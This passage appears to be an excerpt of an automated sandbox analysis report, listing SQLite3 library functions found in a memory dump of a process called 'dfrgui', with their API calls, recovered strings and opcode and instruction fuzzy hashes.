                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                  • String ID:
                                  • API String ID: 154587148-0
                                  • Opcode ID: 70c9e801937e6109543b574a6ef30cc905413df6645566ce293aaeb4a9c8cd1b
                                  • Instruction ID: 457c603a61c59184ab784ef883cb228b515c0b83d7933c29fbf2e1ba9e487abb
                                  • Opcode Fuzzy Hash: 70c9e801937e6109543b574a6ef30cc905413df6645566ce293aaeb4a9c8cd1b
                                  • Instruction Fuzzy Hash: A1811C70E046598BDB54DFAAC48479EFBF1BF88308F24C429E864EB341D73AD8558B51
                                  Function 61E249BB Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                  • String ID:
                                  • API String ID: 3386002893-0
                                  • Opcode ID: dfe5d681ee3ef6c9c6e6e82240f42d63f6d9a3ab3606b681649a1a6758154988
                                  • Instruction ID: 82808ba9451e93200953c8689875a353d65693c42d2cf5a126d43234f852b273
                                  • Opcode Fuzzy Hash: dfe5d681ee3ef6c9c6e6e82240f42d63f6d9a3ab3606b681649a1a6758154988
                                  • Instruction Fuzzy Hash: A5617CB1A046558FDB00CFA8C4A069DBBF1AF8D318F25C56ED895AB390E734D841CB95
                                  Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: Sleep_amsg_exit
                                  • String ID:
                                  • API String ID: 1015461914-0
                                  • Opcode ID: 57724e7b125b6214473e6facac02dbbc00c878a3b3032f833af74ff5c5f022ba
                                  • Instruction ID: 8792648bf9fcdaef9f16fbf28a568ebe056cb6ab70aa0df689dbe8083f43a6c6
                                  • Opcode Fuzzy Hash: 57724e7b125b6214473e6facac02dbbc00c878a3b3032f833af74ff5c5f022ba
                                  • Instruction Fuzzy Hash: 364170B0619A41CBEB41AFE9C58431A7AF1FB8574DF24C92ED6848F340D776C895CB82
                                  Function 61E6BC76 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: invalid rootpage$%a
                                  • API String ID: 0-1093786946
                                  • Opcode ID: 8d1782ff635f7dd8ae3f3805606bc9f0896402c69c13158c974d7fa0051bf420
                                  • Instruction ID: e0ff652ed62c28bbdc248fd7bc1921e44b276cd461225d90b28f0e325e5ff259
                                  • Opcode Fuzzy Hash: 8d1782ff635f7dd8ae3f3805606bc9f0896402c69c13158c974d7fa0051bf420
                                  • Instruction Fuzzy Hash: 19417874A443859BDB10CF69C080B8EBBF9AF99318F64C82DE9989F345D730D841CB92
                                  Function 61E380F6 Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_result_error.SQLITE3 ref: 61E3811E
                                  • sqlite3_value_int.SQLITE3 ref: 61E38130
                                  • sqlite3_value_text.SQLITE3 ref: 61E38146
                                  • sqlite3_value_text.SQLITE3 ref: 61E38154
                                  • sqlite3_result_text.SQLITE3 ref: 61E38236
                                  • sqlite3_free.SQLITE3 ref: 61E38241
                                  • sqlite3_result_error_code.SQLITE3 ref: 61E38257
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                  • String ID:
                                  • API String ID: 2838836587-0
                                  • Opcode ID: 4af5dea1b56501d4db870a9ca61df2f1aa970c4f0b0871d8bbfb93fa1c5484f6
                                  • Instruction ID: 904adb5059fa684c45d4782c6a6921a83b81b0fb55681aa8ade58a233245f17f
                                  • Opcode Fuzzy Hash: 4af5dea1b56501d4db870a9ca61df2f1aa970c4f0b0871d8bbfb93fa1c5484f6
                                  • Instruction Fuzzy Hash: 8C5183B49047599FCB00DFA8C484A9DBBF4BF88354F10892AE898EB354E734D945CF51
                                  Function 61E2481B Relevance: 10.6, APIs: 7, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                  • String ID:
                                  • API String ID: 2264764126-0
                                  • Opcode ID: a74d88234d147792581517540d1faafaaf490ee29babce830b1e1e6df9238842
                                  • Instruction ID: 7a156fee01a37ca3ebfe2bb5458f569e4621baa5d2129305e7e88d3859f29bcf
                                  • Opcode Fuzzy Hash: a74d88234d147792581517540d1faafaaf490ee29babce830b1e1e6df9238842
                                  • Instruction Fuzzy Hash: 6D31A1B5A046568BDB04DFA9C4A06ADBBF0EF8C314F25812BE898D7300D735E941CF51
                                  Function 61E3981D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E39867
                                  • sqlite3_value_text.SQLITE3 ref: 61E39896
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E398BB
                                    • Part of subcall function 61E39162: sqlite3_mprintf.SQLITE3 ref: 61E39177
                                    • Part of subcall function 61E39162: sqlite3_result_error.SQLITE3 ref: 61E3918D
                                    • Part of subcall function 61E39162: sqlite3_free.SQLITE3 ref: 61E39195
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                  • String ID: insert$set
                                  • API String ID: 832408550-3711289001
                                  • Opcode ID: 20409f0703a39ed57f470ffba64e7f75554ddc69d89ef0623225cc09fc748892
                                  • Instruction ID: 8d2c395ed07119da726fb927f95dbaeb3efbe11155e2626f1bf2e887feae2097
                                  • Opcode Fuzzy Hash: 20409f0703a39ed57f470ffba64e7f75554ddc69d89ef0623225cc09fc748892
                                  • Instruction Fuzzy Hash: A8316B70A08259DBDB01DFA8C484BAEBBF5AFC8318F29C459D8959B351DB34E845CB41
                                  Function 61E3466C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_result_error.SQLITE3 ref: 61E34697
                                  • sqlite3_result_error.SQLITE3 ref: 61E346FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_result_error
                                  • String ID: J
                                  • API String ID: 497837271-1141589763
                                  • Opcode ID: 9dcdcfbeeac12923db463cb6f82f29b53090bd787a5ec042b42b222428f2c33b
                                  • Instruction ID: e715ce3b23a9d89d76e15e2e19a0e984e95e63e86c1e7242b94dc3aca91ae2ee
                                  • Opcode Fuzzy Hash: 9dcdcfbeeac12923db463cb6f82f29b53090bd787a5ec042b42b222428f2c33b
                                  • Instruction Fuzzy Hash: 87317174604795DBCB10EF38C884B4DBBA0AF85318F20C52DE8988B341C73AE859CB42
                                  Function 61E33FC1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_value_text.SQLITE3 ref: 61E33FE7
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E33FF1
                                  • sqlite3_value_text.SQLITE3 ref: 61E3401B
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E34026
                                  • sqlite3_result_error.SQLITE3 ref: 61E34066
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                  • String ID: null
                                  • API String ID: 1955785328-634125391
                                  • Opcode ID: 8533b2eee130e50d791db6e9e9d926718f3a7e8371df091bab9cc14544a0324a
                                  • Instruction ID: 3560bd06224b53abc45ba38dce85c2a982ae8dda54192066f63fe29db7d899d4
                                  • Opcode Fuzzy Hash: 8533b2eee130e50d791db6e9e9d926718f3a7e8371df091bab9cc14544a0324a
                                  • Instruction Fuzzy Hash: 681105B2B086544AC704AB6DD4C1256FBE2DBC5328F34C52FD5848B350D236C896CB82
                                  Function 61E327BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E327F1
                                  • sqlite3_value_text.SQLITE3 ref: 61E3281A
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E32827
                                  • sqlite3_value_text.SQLITE3 ref: 61E3284C
                                  • sqlite3_value_bytes.SQLITE3 ref: 61E32858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                  • String ID: ,)?
                                  • API String ID: 4225432645-1010226240
                                  • Opcode ID: ef3a6f03b26403631c46fa568fcbe8f3ba7e27b1abb4dc6df949290a863f3f48
                                  • Instruction ID: ec866d3af9bdfba2f590c54a8d62094c63587880869863bac8bffafc3f3e956d
                                  • Opcode Fuzzy Hash: ef3a6f03b26403631c46fa568fcbe8f3ba7e27b1abb4dc6df949290a863f3f48
                                  • Instruction Fuzzy Hash: F62127B5A046028BDB40DF7DC481A1AFBE5ABE8268B25C429E898CB315E735D841CF81
                                  Function 61E29F16 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E28F7C: sqlite3_log.SQLITE3(?,?,?,?,?,61E2902F), ref: 61E28FB7
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E29F45
                                  • sqlite3_value_text16le.SQLITE3 ref: 61E29F59
                                  • sqlite3_value_text16le.SQLITE3 ref: 61E29F87
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E29F9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID: bad parameter or other API misuse$out of memory
                                  • API String ID: 3568942437-948784999
                                  • Opcode ID: af52fa978ee268feb76dabe1f40ecc78802fe26f8ee2565e2b0ef8161e05dbed
                                  • Instruction ID: 41fbcbcb1b19b461039911a842820c97a0f0e9bc3ba6b775ae2eccda77610216
                                  • Opcode Fuzzy Hash: af52fa978ee268feb76dabe1f40ecc78802fe26f8ee2565e2b0ef8161e05dbed
                                  • Instruction Fuzzy Hash: 2A015671A043514BE750AFB9C4D0A69B7E4AF45358F59C8BCED48CF305E735C8848791
                                  Function 61E0A946 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13FC2), ref: 61E0A970
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13FC2), ref: 61E0A9AC
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13FC2), ref: 61E0A9C5
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13FC2), ref: 61E0A9D8
                                  • sqlite3_free.SQLITE3(?,?,?,61E13FC2), ref: 61E0A9E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                  • String ID: ,a
                                  • API String ID: 251237202-370703091
                                  • Opcode ID: ab264bea2d9c77e2d129669bcaebca5c3caf25764e4eb36a39aa64bcea51463e
                                  • Instruction ID: c3f6eec059ef50e045805afa1e805330da141f4eb0138a33c3ac39ae4b98d8e6
                                  • Opcode Fuzzy Hash: ab264bea2d9c77e2d129669bcaebca5c3caf25764e4eb36a39aa64bcea51463e
                                  • Instruction Fuzzy Hash: 2111E2B8924F418FDB00EFBAC5855287BE4F74634AB558C2BE6888B301E730D4E0CB52
                                  Function 61E3B940 Relevance: 9.4, APIs: 6, Instructions: 376stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • strcmp.MSVCRT ref: 61E3BD5B
                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E3BD93
                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E3BDAC
                                  • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E3BDE3
                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E3BDFC
                                  • sqlite3_free.SQLITE3 ref: 61E3BE0F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_logstrcmp
                                  • String ID:
                                  • API String ID: 2202632817-0
                                  • Opcode ID: b32ffa91df4674a485ddd260d8e3abb6ef3d06a3fc22803a0b37edad2b15009c
                                  • Instruction ID: 1983614f7065cedc0ffcafa89ea7fbc1f21b007b8bfb024b5e20b35acb653884
                                  • Opcode Fuzzy Hash: b32ffa91df4674a485ddd260d8e3abb6ef3d06a3fc22803a0b37edad2b15009c
                                  • Instruction Fuzzy Hash: 71F1F470E046598FDB04CFA9C48479DBBF1AF88318F24C529D85AAB358EB74E846CF41
                                  Function 61E163ED Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
